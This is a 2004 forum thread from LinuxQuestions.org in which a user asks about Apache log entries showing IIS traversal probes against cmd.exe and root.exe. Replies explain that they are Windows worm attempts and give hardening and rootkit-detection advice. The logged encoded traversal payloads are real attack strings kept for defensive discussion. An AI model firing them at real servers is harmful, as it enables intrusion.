LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
-   -   Should i worry? (https://www.linuxquestions.org/questions/linux-security-4/should-i-worry-133741/)

Hovi 01-11-2004 02:16 PM
Should i worry?
 
i saw this in my access log:
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 962 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 962 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"

Should i worry and what is this person trying to do??
thnx in advance

chort 01-11-2004 04:00 PM
No, it's just a mindless IIS exploit. It does not affect non-Windows boxen.

Hovi 01-11-2004 06:34 PM
thnx
By the way how would i know if i got hacked?

chort 01-11-2004 06:43 PM
If you see a message like this on your console:
w3 0wnZ j00!

Hovi 01-11-2004 09:26 PM
lol haha thnx for the pointers.~_^

Capt_Caveman 01-11-2004 11:39 PM
Just as a general rule of thumb, anytime you see entries in your Apache log that have a .exe as part of the URL (usually as cmd.exe), you can feel pretty confident that what you're looking at is a Windows exploit attempt. The /winnt/system32/ path is a dead give away as well.

unSpawn 01-12-2004 10:16 AM
By the way how would i know if i got hacked?
To determine chances of getting your box being subverted depends for instance on:
1. what (publicly accessable) services you run and how they are secured (and access to them),
2. what (way) users are allowed (limit(ed|less)) access to the system,
3. what access rights users have to system commands and resources.
The generic best way to remove possibilities for system compromise is to work and think along the lines of the ancient security mantra: "that which is not explicitly allowed is forbidden". For details on securing and hardening, please see the LQ FAQ: Security references.


To know what the "best" ways to check for system compromise are and how to prevent them or determine status, you should know a system can be controlled by a cracker. The worst case scenario will reroute system calls to for instance filter out and hide processes. This can be done for instance by loading a Linux Kernel Module (LKM, see for instance the Adore-ng LKM), changing the running kernel's memory (see for instance the Suck-IT rootkit or Google for Silvio Cesare's docs) or preloading a library (ld.so rootkit).
The generic best way to address these issues is to:
1. take away capabilities to load modules and change memory structures (in the case of LKM's: kernel recompile or lcap, rest: kernel patch: 2.2.x: Open Wall, 2.4.x: Grsecurity, LIDS, 2.6.x Grsecurity or LSM?), and
2. deny users access to resources (files, devices, processes) they do not explicitly need, and
3. make system binaries, config files, authentication databases immutable (or partition mounted readonly when not using ext2/ext3fs) and make access logs append-only.


The generic best way to detect system tampering is to:
1. install and regularly run a filesystem integrity scanner (Aide, Samhain, tripwire) right after you installed the OS, and before it was connected to a network. Save a copy of the binary, databases (,system configs and package manager databases) on readonly media (or secured signature server) for later use. If unsure, reboot the box loading a kernel from a trusted source like your distributions bootable cdrom, Knoppix, Trinux, tomsrtbt before checking.
This solution beats running Chkrootkit or Rootkit Hunter, because the result should show *any* changed file on the system and not just in the statically coded locations like those two apps use.
2. verbose and make use of system logging, process the logs and regularly check the reports.
The essence is that whatever exploiting takes place most likely will be noisy, and so logging about everything gives you a better view on what's happening. Verbose logging should not be seen as a nuisance: you can't detect problems if you don't log 'em. Run a logwatcher/analyser to regularly supply you with logs. Please check out Grsecurity, logging options else maybe try the procmon LKM.
Here's an example of Grsecurity doing exec logging (in a chroot, syslog date cut away):
Code:
exec of /chroot/hammettk/bin/ls within chroot by process (bash:22741) UID(1001) EUID(1001), parent (bash:8391) UID(1001) EUID(1001)
exec of /chroot/hammettk/usr/bin/du within chroot by process (bash:23616) UID(1001) EUID(1001), parent (bash:13778) UID(1001) EUID(1001)
exec of /chroot/hammettk/usr/bin/df within chroot by process (bash:16468) UID(1001) EUID(1001), parent (bash:13778) UID(1001) EUID(1001)
Here's an example of Procmon doing exec logging (date cut away):
Code:
1001:22741:/bin/ls --color
1001:23616:/usr/bin/du
1001:16468:/usr/bin/df -h
3. In the case you suspect a LKM to be loaded you have two options:
- passive: check your ksyms log if your have recent modutils package (both examples: adore):
Code:
__insmod_adore_O/var/tmp/ka/adore.o_M3FDDF647_V132117 [adore]
 __insmod_adore_S.text_L4944 [adore]
Note logging can easily be avoided if the cracker supplies her own insmod binary, kills, reroutes or denies logging or scrubs the logs.
- active: you could try running kern_check. If the result shows something like:
Code:
WARNING: (kernel) 0xe1b9d220 != 0xc01dc990 (map)  [sys_open]
WARNING: (kernel) 0xe1b9d1a8 != 0xc01dbf40 (map)  [sys_chdir]
WARNING: (kernel) 0xe1b9d094 != 0xc01ed590 (map)  [sys_getdents]
WARNING: (kernel) 0xe1b9d2a4 != 0xc01c38f0 (map)  [sys_getgid]
it's time to investigate. Note: not with kernels that deny reading /dev/kmem.
4. Run Chkrootkit.


This is not all, but at least you've got an basic idea I hope...

Hovi 01-12-2004 03:16 PM
Well thnx for the responses..Really helps.New to this security thing :)
thnx for the help guys.~_^


All times are GMT -5. The time now is 02:11 AM.